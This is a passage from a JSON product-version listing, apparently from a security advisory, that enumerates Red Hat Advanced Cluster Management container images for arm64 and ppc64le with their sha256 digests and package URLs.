"product_id": "registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:8243cc9646e4ae89aabf299e476a94124c8244dd54e0fb1c848a6bbbd0c94f62_arm64",
"product_identification_helper": {
"purl": "pkg:oci/acm-siteconfig-rhel9@sha256%3A8243cc9646e4ae89aabf299e476a94124c8244dd54e0fb1c848a6bbbd0c94f62?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1775657510"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:036ee3882d4d6536c309d9aacea3dc611785deba3bd998092adcb1ba21664897_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:036ee3882d4d6536c309d9aacea3dc611785deba3bd998092adcb1ba21664897_arm64",
"product_id": "registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:036ee3882d4d6536c309d9aacea3dc611785deba3bd998092adcb1ba21664897_arm64",
"product_identification_helper": {
"purl": "pkg:oci/submariner-addon-rhel9@sha256%3A036ee3882d4d6536c309d9aacea3dc611785deba3bd998092adcb1ba21664897?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915751"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/thanos-rhel9@sha256:b8d70910405eec4d886b27fc348a982c0b6f906f7f0e65aceecffd9f09fd6602_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/thanos-rhel9@sha256:b8d70910405eec4d886b27fc348a982c0b6f906f7f0e65aceecffd9f09fd6602_arm64",
"product_id": "registry.redhat.io/rhacm2/thanos-rhel9@sha256:b8d70910405eec4d886b27fc348a982c0b6f906f7f0e65aceecffd9f09fd6602_arm64",
"product_identification_helper": {
"purl": "pkg:oci/thanos-rhel9@sha256%3Ab8d70910405eec4d886b27fc348a982c0b6f906f7f0e65aceecffd9f09fd6602?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915751"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:721ebc57b91b4f9bcfb25d7b29ee8a2ca60fcb231096af2812f9201778e3ca51_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:721ebc57b91b4f9bcfb25d7b29ee8a2ca60fcb231096af2812f9201778e3ca51_arm64",
"product_id": "registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:721ebc57b91b4f9bcfb25d7b29ee8a2ca60fcb231096af2812f9201778e3ca51_arm64",
"product_identification_helper": {
"purl": "pkg:oci/thanos-receive-controller-rhel9@sha256%3A721ebc57b91b4f9bcfb25d7b29ee8a2ca60fcb231096af2812f9201778e3ca51?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915823"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:2a64ce4183df6c5743ffa7df7b4192fce192e08eea5e03b76c9b621e5d351d2a_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:2a64ce4183df6c5743ffa7df7b4192fce192e08eea5e03b76c9b621e5d351d2a_arm64",
"product_id": "registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:2a64ce4183df6c5743ffa7df7b4192fce192e08eea5e03b76c9b621e5d351d2a_arm64",
"product_identification_helper": {
"purl": "pkg:oci/acm-volsync-addon-controller-rhel9@sha256%3A2a64ce4183df6c5743ffa7df7b4192fce192e08eea5e03b76c9b621e5d351d2a?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774984227"
}
}
}
],
"category": "architecture",
"name": "arm64"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:1c74aaa66b6be9f5eb1f55851f1cc3f2a3878882c3fc972cd24232e9022f74e2_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:1c74aaa66b6be9f5eb1f55851f1cc3f2a3878882c3fc972cd24232e9022f74e2_ppc64le",
"product_id": "registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:1c74aaa66b6be9f5eb1f55851f1cc3f2a3878882c3fc972cd24232e9022f74e2_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/acm-cli-rhel9@sha256%3A1c74aaa66b6be9f5eb1f55851f1cc3f2a3878882c3fc972cd24232e9022f74e2?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915148"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:c17ac85849d3cdf437d09d8ce9581b48a73304498a315db470ec655fdb88f529_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:c17ac85849d3cdf437d09d8ce9581b48a73304498a315db470ec655fdb88f529_ppc64le",
"product_id": "registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:c17ac85849d3cdf437d09d8ce9581b48a73304498a315db470ec655fdb88f529_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/cert-policy-controller-rhel9@sha256%3Ac17ac85849d3cdf437d09d8ce9581b48a73304498a315db470ec655fdb88f529?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915173"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:1ef6867542269af4ce8cee7225dfb4e64680715a1bb34ed510b9fbf84d88fb2d_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:1ef6867542269af4ce8cee7225dfb4e64680715a1bb34ed510b9fbf84d88fb2d_ppc64le",
"product_id": "registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:1ef6867542269af4ce8cee7225dfb4e64680715a1bb34ed510b9fbf84d88fb2d_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/cluster-backup-rhel9-operator@sha256%3A1ef6867542269af4ce8cee7225dfb4e64680715a1bb34ed510b9fbf84d88fb2d?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915147"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:3ae25beb920ec77de14769895f60da6a3d83fc41192ca5da5f976076853e5a50_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:3ae25beb920ec77de14769895f60da6a3d83fc41192ca5da5f976076853e5a50_ppc64le",
"product_id": "registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:3ae25beb920ec77de14769895f60da6a3d83fc41192ca5da5f976076853e5a50_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/acm-cluster-permission-rhel9@sha256%3A3ae25beb920ec77de14769895f60da6a3d83fc41192ca5da5f976076853e5a50?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1775441299"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:723dd5b7b166ed9fcedd2f6b2b2567e943ffcfa78bfe7974ac410d629495bc27_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:723dd5b7b166ed9fcedd2f6b2b2567e943ffcfa78bfe7974ac410d629495bc27_ppc64le",
"product_id": "registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:723dd5b7b166ed9fcedd2f6b2b2567e943ffcfa78bfe7974ac410d629495bc27_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/config-policy-controller-rhel9@sha256%3A723dd5b7b166ed9fcedd2f6b2b2567e943ffcfa78bfe7974ac410d629495bc27?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915248"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/console-rhel9@sha256:a765f440d03be4c90a764f6ec1a2bf2d4c4acb0f8af630aff9811aaa631327ca_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/console-rhel9@sha256:a765f440d03be4c90a764f6ec1a2bf2d4c4acb0f8af630aff9811aaa631327ca_ppc64le",
"product_id": "registry.redhat.io/rhacm2/console-rhel9@sha256:a765f440d03be4c90a764f6ec1a2bf2d4c4acb0f8af630aff9811aaa631327ca_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/console-rhel9@sha256%3Aa765f440d03be4c90a764f6ec1a2bf2d4c4acb0f8af630aff9811aaa631327ca?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1775116130"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:fbf35da688ccf2c7049320cee23dcbc518d2787d52c78574ff44e481a38ec20f_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:fbf35da688ccf2c7049320cee23dcbc518d2787d52c78574ff44e481a38ec20f_ppc64le",
"product_id": "registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:fbf35da688ccf2c7049320cee23dcbc518d2787d52c78574ff44e481a38ec20f_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/endpoint-monitoring-rhel9-operator@sha256%3Afbf35da688ccf2c7049320cee23dcbc518d2787d52c78574ff44e481a38ec20f?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915416"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:abcf4d6f42dec254d8b4197282fb449daf13d4724ed23ddc2aafde0328338f74_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:abcf4d6f42dec254d8b4197282fb449daf13d4724ed23ddc2aafde0328338f74_ppc64le",
"product_id": "registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:abcf4d6f42dec254d8b4197282fb449daf13d4724ed23ddc2aafde0328338f74_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/acm-governance-policy-addon-controller-rhel9@sha256%3Aabcf4d6f42dec254d8b4197282fb449daf13d4724ed23ddc2aafde0328338f74?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915330"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:849cf23afa514a1d86073fed2424e487893655510721a0b9c0d4be4cf59bf60b_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:849cf23afa514a1d86073fed2424e487893655510721a0b9c0d4be4cf59bf60b_ppc64le",
"product_id": "registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:849cf23afa514a1d86073fed2424e487893655510721a0b9c0d4be4cf59bf60b_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/acm-governance-policy-framework-addon-rhel9@sha256%3A849cf23afa514a1d86073fed2424e487893655510721a0b9c0d4be4cf59bf60b?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915336"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:8fb71c30e1217f0697c872db2bafbb5e06a7f727c6b508f269512447d6b5118d_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:8fb71c30e1217f0697c872db2bafbb5e06a7f727c6b508f269512447d6b5118d_ppc64le",
"product_id": "registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:8fb71c30e1217f0697c872db2bafbb5e06a7f727c6b508f269512447d6b5118d_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/governance-policy-propagator-rhel9@sha256%3A8fb71c30e1217f0697c872db2bafbb5e06a7f727c6b508f269512447d6b5118d?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915333"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:5145c15e9fa57bdd1d072e7c88f27d5f8f51caf395e542ad8fb54a098f8c24fb_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:5145c15e9fa57bdd1d072e7c88f27d5f8f51caf395e542ad8fb54a098f8c24fb_ppc64le",
"product_id": "registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:5145c15e9fa57bdd1d072e7c88f27d5f8f51caf395e542ad8fb54a098f8c24fb_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/acm-grafana-rhel9@sha256%3A5145c15e9fa57bdd1d072e7c88f27d5f8f51caf395e542ad8fb54a098f8c24fb?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774950654"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:83bc597e83bd0756afa67adcbd50858b0d1c23f87b572706e9059dd26055b4a0_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:83bc597e83bd0756afa67adcbd50858b0d1c23f87b572706e9059dd26055b4a0_ppc64le",
"product_id": "registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:83bc597e83bd0756afa67adcbd50858b0d1c23f87b572706e9059dd26055b4a0_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/grafana-dashboard-loader-rhel9@sha256%3A83bc597e83bd0756afa67adcbd50858b0d1c23f87b572706e9059dd26055b4a0?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915373"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/insights-client-rhel9@sha256:b30887b0c8fb4292b6c87ef681761c18a112e0113647e2bde86c04c13f59b7a5_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/insights-client-rhel9@sha256:b30887b0c8fb4292b6c87ef681761c18a112e0113647e2bde86c04c13f59b7a5_ppc64le",
"product_id": "registry.redhat.io/rhacm2/insights-client-rhel9@sha256:b30887b0c8fb4292b6c87ef681761c18a112e0113647e2bde86c04c13f59b7a5_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/insights-client-rhel9@sha256%3Ab30887b0c8fb4292b6c87ef681761c18a112e0113647e2bde86c04c13f59b7a5?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915432"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:6d410e7e4de91970f44368e5cc1ce1ac83908550785263342f6038a988be30e4_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:6d410e7e4de91970f44368e5cc1ce1ac83908550785263342f6038a988be30e4_ppc64le",
"product_id": "registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:6d410e7e4de91970f44368e5cc1ce1ac83908550785263342f6038a988be30e4_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/insights-metrics-rhel9@sha256%3A6d410e7e4de91970f44368e5cc1ce1ac83908550785263342f6038a988be30e4?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915327"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:21f6d86d21be3a9541fc577a647d8f38b81bca975dc82d9506056f44e6a35443_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:21f6d86d21be3a9541fc577a647d8f38b81bca975dc82d9506056f44e6a35443_ppc64le",
"product_id": "registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:21f6d86d21be3a9541fc577a647d8f38b81bca975dc82d9506056f44e6a35443_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/klusterlet-addon-controller-rhel9@sha256%3A21f6d86d21be3a9541fc577a647d8f38b81bca975dc82d9506056f44e6a35443?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915355"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:cf1c1c1c778cafe6067df490969aab89a6b3e43487d954bb24b1409bc22f1091_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:cf1c1c1c778cafe6067df490969aab89a6b3e43487d954bb24b1409bc22f1091_ppc64le",
"product_id": "registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:cf1c1c1c778cafe6067df490969aab89a6b3e43487d954bb24b1409bc22f1091_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/kube-rbac-proxy-rhel9@sha256%3Acf1c1c1c778cafe6067df490969aab89a6b3e43487d954bb24b1409bc22f1091?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1775630574"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:118fe4fc31cb7818cda240c48628e5a3d43002c271fa7ba45d9631b7a6ddb8e2_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:118fe4fc31cb7818cda240c48628e5a3d43002c271fa7ba45d9631b7a6ddb8e2_ppc64le",
"product_id": "registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:118fe4fc31cb7818cda240c48628e5a3d43002c271fa7ba45d9631b7a6ddb8e2_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/kube-state-metrics-rhel9@sha256%3A118fe4fc31cb7818cda240c48628e5a3d43002c271fa7ba45d9631b7a6ddb8e2?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915418"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:a36bcef862d0e3cc972c9eb2c0d80311030659c13de6acab7e353905ff5eccff_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:a36bcef862d0e3cc972c9eb2c0d80311030659c13de6acab7e353905ff5eccff_ppc64le",
"product_id": "registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:a36bcef862d0e3cc972c9eb2c0d80311030659c13de6acab7e353905ff5eccff_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/memcached-exporter-rhel9@sha256%3Aa36bcef862d0e3cc972c9eb2c0d80311030659c13de6acab7e353905ff5eccff?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1775466899"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:2003587575e18b2e6b9bf3617c65e0f83ebc8cf30daf6dd241500cd1555820e0_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:2003587575e18b2e6b9bf3617c65e0f83ebc8cf30daf6dd241500cd1555820e0_ppc64le",
"product_id": "registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:2003587575e18b2e6b9bf3617c65e0f83ebc8cf30daf6dd241500cd1555820e0_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/metrics-collector-rhel9@sha256%3A2003587575e18b2e6b9bf3617c65e0f83ebc8cf30daf6dd241500cd1555820e0?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915508"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:14fb16412dea57a775e95954c3a07a77de846f851935629bf9bfdbcc46a70f4f_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:14fb16412dea57a775e95954c3a07a77de846f851935629bf9bfdbcc46a70f4f_ppc64le",
"product_id": "registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:14fb16412dea57a775e95954c3a07a77de846f851935629bf9bfdbcc46a70f4f_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/multicloud-integrations-rhel9@sha256%3A14fb16412dea57a775e95954c3a07a77de846f851935629bf9bfdbcc46a70f4f?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1775326442"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:921a7995304e4648ac2fd0c08bec7d95adc09caca4d6d124cbba4ff8043edf19_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:921a7995304e4648ac2fd0c08bec7d95adc09caca4d6d124cbba4ff8043edf19_ppc64le",
"product_id": "registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:921a7995304e4648ac2fd0c08bec7d95adc09caca4d6d124cbba4ff8043edf19_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/acm-multicluster-observability-addon-rhel9@sha256%3A921a7995304e4648ac2fd0c08bec7d95adc09caca4d6d124cbba4ff8043edf19?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915504"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:9e19fc6fd3285c1833cd97eeef10cb179fe9705dea9b3f912052207b3a2daea7_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:9e19fc6fd3285c1833cd97eeef10cb179fe9705dea9b3f912052207b3a2daea7_ppc64le",
"product_id": "registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:9e19fc6fd3285c1833cd97eeef10cb179fe9705dea9b3f912052207b3a2daea7_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/multicluster-observability-rhel9-operator@sha256%3A9e19fc6fd3285c1833cd97eeef10cb179fe9705dea9b3f912052207b3a2daea7?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915540"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:7fe0726987e478ed3da6d9b1eb4b611461e285ada827de6a186b95bc75a36c73_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:7fe0726987e478ed3da6d9b1eb4b611461e285ada827de6a186b95bc75a36c73_ppc64le",
"product_id": "registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:7fe0726987e478ed3da6d9b1eb4b611461e285ada827de6a186b95bc75a36c73_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/multicluster-operators-application-rhel9@sha256%3A7fe0726987e478ed3da6d9b1eb4b611461e285ada827de6a186b95bc75a36c73?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915538"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:9bc74577f0edc3045a1a027c0f8652cc904fc3b9397dc9af10576f9dfcab2080_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:9bc74577f0edc3045a1a027c0f8652cc904fc3b9397dc9af10576f9dfcab2080_ppc64le",
"product_id": "registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:9bc74577f0edc3045a1a027c0f8652cc904fc3b9397dc9af10576f9dfcab2080_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/multicluster-operators-channel-rhel9@sha256%3A9bc74577f0edc3045a1a027c0f8652cc904fc3b9397dc9af10576f9dfcab2080?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1775585006"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:01778cb2a2b9771a03ed8c7feb5b94a23225f60f4e49263e71dccd017cfd1164_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:01778cb2a2b9771a03ed8c7feb5b94a23225f60f4e49263e71dccd017cfd1164_ppc64le",
"product_id": "registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:01778cb2a2b9771a03ed8c7feb5b94a23225f60f4e49263e71dccd017cfd1164_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/multicluster-operators-subscription-rhel9@sha256%3A01778cb2a2b9771a03ed8c7feb5b94a23225f60f4e49263e71dccd017cfd1164?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1775176904"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:6bd79f2c4c516adc626c73dec28892cbeab65e349dff8f1fcb11d7242b614805_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:6bd79f2c4c516adc626c73dec28892cbeab65e349dff8f1fcb11d7242b614805_ppc64le",
"product_id": "registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:6bd79f2c4c516adc626c73dec28892cbeab65e349dff8f1fcb11d7242b614805_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/multiclusterhub-rhel9@sha256%3A6bd79f2c4c516adc626c73dec28892cbeab65e349dff8f1fcb11d7242b614805?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915533"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:4afad9568dc7dd2d90c396d08d596258e813bb67e2901135b539f279af382e09_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:4afad9568dc7dd2d90c396d08d596258e813bb67e2901135b539f279af382e09_ppc64le",
"product_id": "registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:4afad9568dc7dd2d90c396d08d596258e813bb67e2901135b539f279af382e09_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/acm-must-gather-rhel9@sha256%3A4afad9568dc7dd2d90c396d08d596258e813bb67e2901135b539f279af382e09?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1775077876"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:c58049e17034c0df635df55fce49cab392af3194f57c03bbb842d7c2acb247e5_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:c58049e17034c0df635df55fce49cab392af3194f57c03bbb842d7c2acb247e5_ppc64le",
"product_id": "registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:c58049e17034c0df635df55fce49cab392af3194f57c03bbb842d7c2acb247e5_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/node-exporter-rhel9@sha256%3Ac58049e17034c0df635df55fce49cab392af3194f57c03bbb842d7c2acb247e5?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915524"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/observatorium-rhel9@sha256:62c7b78b2726fd940db4bd435b13f6d07097395b069130b32ea0912c95333555_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/observatorium-rhel9@sha256:62c7b78b2726fd940db4bd435b13f6d07097395b069130b32ea0912c95333555_ppc64le",
"product_id": "registry.redhat.io/rhacm2/observatorium-rhel9@sha256:62c7b78b2726fd940db4bd435b13f6d07097395b069130b32ea0912c95333555_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/observatorium-rhel9@sha256%3A62c7b78b2726fd940db4bd435b13f6d07097395b069130b32ea0912c95333555?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915522"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:9819517abcb75b516ea0e158ad9cbb0a4ef847f7858531b751c04de5a53527be_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:9819517abcb75b516ea0e158ad9cbb0a4ef847f7858531b751c04de5a53527be_ppc64le",
"product_id": "registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:9819517abcb75b516ea0e158ad9cbb0a4ef847f7858531b751c04de5a53527be_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/observatorium-rhel9-operator@sha256%3A9819517abcb75b516ea0e158ad9cbb0a4ef847f7858531b751c04de5a53527be?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1775281134"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/prometheus-rhel9@sha256:51096baed7d6ed403d88ac2dd935a30313f618b7552fee2b07367db5069601d1_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/prometheus-rhel9@sha256:51096baed7d6ed403d88ac2dd935a30313f618b7552fee2b07367db5069601d1_ppc64le",
"product_id": "registry.redhat.io/rhacm2/prometheus-rhel9@sha256:51096baed7d6ed403d88ac2dd935a30313f618b7552fee2b07367db5069601d1_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/prometheus-rhel9@sha256%3A51096baed7d6ed403d88ac2dd935a30313f618b7552fee2b07367db5069601d1?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915610"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:e539ec4ab10e81c08d68991e3c77efd43497f4a5561ee1315ff8d467736d245a_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:e539ec4ab10e81c08d68991e3c77efd43497f4a5561ee1315ff8d467736d245a_ppc64le",
"product_id": "registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:e539ec4ab10e81c08d68991e3c77efd43497f4a5561ee1315ff8d467736d245a_ppc64le",
"product_identification_helper": {
